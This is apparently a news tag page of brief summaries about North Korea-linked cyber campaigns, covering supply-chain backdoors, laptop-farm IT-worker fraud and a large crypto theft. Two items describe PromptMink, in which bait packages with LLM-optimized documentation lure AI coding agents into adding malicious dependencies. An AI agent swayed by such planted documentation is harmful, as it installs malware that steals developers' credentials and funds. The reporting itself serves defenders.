All news with #north korea nexus tag

📄 ESET summarizes notable APT activity observed between October 2025 and March 2026, highlighting China-, Iran-, North Korea-, and Russia-aligned operations alongside unattributed clusters. The report illustrates geopolitical drivers behind campaigns, describes new tooling and supply-chain compromises such as a trojanized axios package, and notes destructive incidents impacting critical infrastructure. ESET confirms protections by its products and notes the report reflects a subset of its Threat Intelligence.

🛡️ New RUSI research warns that adversaries, notably North Korea and Iran, are moving from AI-assisted to AI-enabled sanctions evasion and proliferation financing. The report highlights AI’s ability to mass-produce fraudulent documents, automate shell-company administration, and analyze blockchain flows to evade detection. Experts urge enterprises to adopt behavior-based analytics, defensive AI, stronger identity verification and updated training to counter these evolving threats.

🔐 Three separate April reports describe unrelated threat actors independently targeting developer machines as the preferred initial-access vector. The incidents include a North Korean campaign that trojanized packages across five ecosystems, a Zig-compiled native binary that infects IDEs, and a cascading compromise chaining developer tools into credential theft. Together they illustrate how developer workstations function as credential stores, pipeline controllers and trust anchors, and why traditional endpoint controls are insufficient. Organizations must improve visibility, isolate build environments, enforce stricter controls on IDE extensions and package installs, and assign clear ownership for this distinct attack surface.

🔒 Two U.S. nationals, Matthew Isaac Knoot and Erick Ntekereze Prince, were each sentenced to 18 months in prison for operating laptop farms that enabled North Korean IT workers to fraudulently obtain remote employment at nearly 70 U.S. companies. Authorities say the defendants used stolen identities and remote desktop software to mask foreign workers as U.S.-based employees, resulting in substantial payroll fraud and remediation costs. Courts imposed prison terms, forfeitures, and restitution as part of a broader federal effort to disrupt North Korea's illicit revenue operations.

⚠️ ReversingLabs researchers describe an ongoing supply‑chain campaign called PromptMink that manipulates AI coding agents into installing malicious dependencies. Attackers publish bait packages with persuasive READMEs and LLM‑optimized documentation on registries like NPM and PyPI to increase discovery by autonomous agents and developers. The operation, attributed to North Korea’s Famous Chollima, paired legitimate‑looking SDKs with second‑layer packages carrying infostealers, later evolving to compiled Rust add‑ons, SEAs, SSH backdoors, and project exfiltration.

🔎 A North Korea-aligned espionage group has trojanized Windows and Android clients on a regional Yanbian gaming site, according to ESET. The campaign, attributed to ScarCruft (APT37), delivered an Android port of the BirdCall backdoor (internally named zhuagou) and a trojanized mono.dll on Windows to deploy RokRAT and BirdCall. The malware harvests contacts, SMS, files, screenshots and audio, and routes command-and-control through cloud storage accounts.

⚠️ ESET reports that the North Korea‑aligned threat group ScarCruft compromised the sqgame[.]net gaming platform in a targeted supply‑chain operation to deploy the BirdCall backdoor to Android and Windows users. The compromise, active since late 2024, trojanized Android APKs for two games and delivered a malicious Windows update DLL that used RokRAT as a loader. BirdCall — an evolution of RokRAT — harvests contacts, SMS, call logs, media, screenshots, keystrokes and ambient audio, and leverages legitimate cloud services for command‑and‑control.

📱 ESET researchers report that North Korean-linked APT37 (ScarCruft) developed an Android variant of the BirdCall backdoor and distributed it through trojanized APKs on the sqgame.net game platform. The Android implant, first seen around October 2024 and produced in at least seven variants, collects contacts, call logs, SMS, device identifiers, location and system metrics, takes periodic screenshots, records audio during evening hours, and exfiltrates targeted files to a C2. The campaign focused on users in the Yanbian region and underscores ScarCruft’s continued use of supply-chain tactics; users are advised to download apps only from official marketplaces and trusted publishers.

🕵️ ESET researchers uncovered a supply‑chain attack by North Korea‑aligned APT ScarCruft that trojanized a Yanbian‑focused gaming platform. The operation used a malicious Windows update to deploy RokRAT and ultimately the sophisticated BirdCall backdoor, while repackaged Android APKs contained a newly identified Android port of BirdCall. The backdoor harvests files, contacts, screenshots and ambient audio for targeted espionage.

🛡️ Researchers identified an AI-assisted supply-chain campaign that injected malicious code into npm packages — notably @validate-sdk/v2 — after a dependency was introduced by Anthropic's Claude Opus LLM. ReversingLabs named the operation PromptMink and attributed it to DPRK-aligned actor Famous Chollima (aka Shifty Corsair). The tainted packages siphon crypto credentials and secrets through layered transitive dependencies and have evolved into multi-platform RATs and information stealers.

🔍 Researchers at ReversingLabs uncovered a malicious npm dependency, @validate-sdk/v2, that exfiltrated secrets and enabled attackers to access cryptocurrency wallets after being added to an autonomous trading agent in February 2026. The commit is reported to have been co-authored by Claude Opus, and attribution points to the North Korean state-sponsored group Famous Chollima. The campaign, tracked as PromptMink, used a two-layer package strategy—public-facing Web3 utilities to attract users while secondary dependencies delivered evolving malware that scanned environment files, collected system information, compressed project data, and installed SSH keys for persistence across Linux and Windows environments.

🔔 LayerZero-linked infrastructure poisoning likely enabled a North Korean-linked group (TraderTraitor/TraderTraiter) to steal $290M from KelpDAO by compromising RPC nodes and exploiting a quorum while a DDoS distracted a third node, prompting an Arbitrum Security Council freeze. At the same time, active RCE attacks, malicious npm packages delivering credential stealers and SSH backdoors, and indirect AI prompt injection payloads are accelerating breaches. The bulletin also flags covert browser access by desktop AI apps, a surge in commodified malware, SIM-farm services, and persistent exploitation of long-known weaknesses; the practical remedies remain patch early, verify dependencies, and restrict implicit trust.

🔍 Microsoft observed North Korea-aligned actors posing as legitimate hires—using stolen or fabricated identities and generative AI—to gain trusted access to corporate SaaS. They target external career sites and Workday Recruiting APIs (hrrecruiting/*) to submit convincing applications, complete onboarding, then use legitimate accounts to access Teams, SharePoint, OneDrive, and Exchange Online. Defenders should correlate multi-source telemetry, enable Microsoft Defender for Cloud Apps connectors, and monitor behavioral anomalies in candidates and new hires.

🔒 State-backed North Korean actors are the primary suspects in a roughly $293m theft from KelpDAO, which paused operations after detecting suspicious cross-chain activity involving rsETH. Attackers exploited LayerZero verifier infrastructure by poisoning downstream RPCs, swapping op-geth binaries and executing an RPC‑spoofing attack to forge a cross-chain message. They routed stolen funds through Tornado Cash, while Arbitrum's Security Council has frozen about 30,766 ETH (~$71m). LayerZero contends KelpDAO ran a single-DVN configuration against best practices; KelpDAO blames LayerZero's infrastructure.

🔒 KelpDAO reported a cross-chain exploit on April 18 that resulted in the theft of roughly 116,500 rsETH (about $293 million), funds which were then routed through Tornado Cash. The attacker compromised the verifier's RPC nodes in the DVN layer, feeding falsified chain data while DDoS-ing healthy nodes to force reliance on poisoned endpoints and accept a forged cross-chain message. LayerZero, Unichain and partners assisted in the investigation, which attributed the operation to the state-sponsored Lazarus Group, and KelpDAO paused rsETH contracts across Ethereum mainnet and L2s.

🔒 Two US nationals were sentenced after admitting they helped operate a scheme that placed North Korean remote IT workers into roles at more than 100 US organisations, including several Fortune 500 firms. Court filings say Kejia Wang (42) and Zhenxing Wang (39) used the stolen identities of at least 80 Americans, received laptops at their US addresses, provided remote access to DPRK-based operators and set up shell companies to launder payments to DPRK. They received prison terms of 108 and 92 months respectively after pleading guilty to conspiracy charges including wire fraud and money laundering; Zhenxing Wang also pleaded guilty to conspiracy to commit identity theft.

⚠️ Microsoft Threat Intelligence describes a macOS campaign by the North Korea‑linked actor Sapphire Sleet that relies on social engineering instead of software exploits. The actor impersonated a legitimate update and lured victims to open a compiled AppleScript (.scpt) in Script Editor, then used cascading curl | osascript stages to deploy Mach‑O backdoors, harvest credentials, and exfiltrate cryptocurrency and personal data. Apple and Microsoft deployed protections and detections; defenders should block unsigned .scpt files and monitor curl/osascript chains.

🔒 Two U.S. nationals were sentenced to prison for facilitating a scheme that placed North Korean IT workers as faux U.S. employees at more than 100 American companies, including Fortune 500 firms. Between 2021 and October 2024 the pair generated over $5 million for DPRK-linked operations and caused roughly $3 million in corporate losses by using the stolen identities of more than 80 U.S. citizens. They set up shell companies, fake websites, bank accounts, and even hosted company-issued laptops in U.S. homes to mask the remote workers' true locations.

🔒 North Korea–linked APT37 has been observed using Facebook friend requests and Messenger to build trust with targets before moving conversations to Telegram and distributing a ZIP archive containing a trojanized Wondershare PDFelement. The tampered installer executes encrypted shellcode that contacts a compromised legitimate site, japanroom[.]com, to fetch a seemingly benign JPG which stages the RokRAT payload. The malware then leverages Zoho WorkDrive for command-and-control, enabling screenshots, remote command execution via cmd.exe, host reconnaissance, and evasion of security products.

🔒 Socket Security researchers say the North Korea-linked campaign known as Contagious Interview has published more than 1,700 malicious packages across npm, PyPI, Go, Rust and Packagist. The packages impersonate legitimate developer tooling and act as loaders that fetch platform-specific malware with infostealer and RAT capabilities. A Windows variant delivered through license-utils-kit behaves as a full implant, enabling command execution, keystroke logging, browser and wallet theft, file exfiltration and remote access via AnyDesk.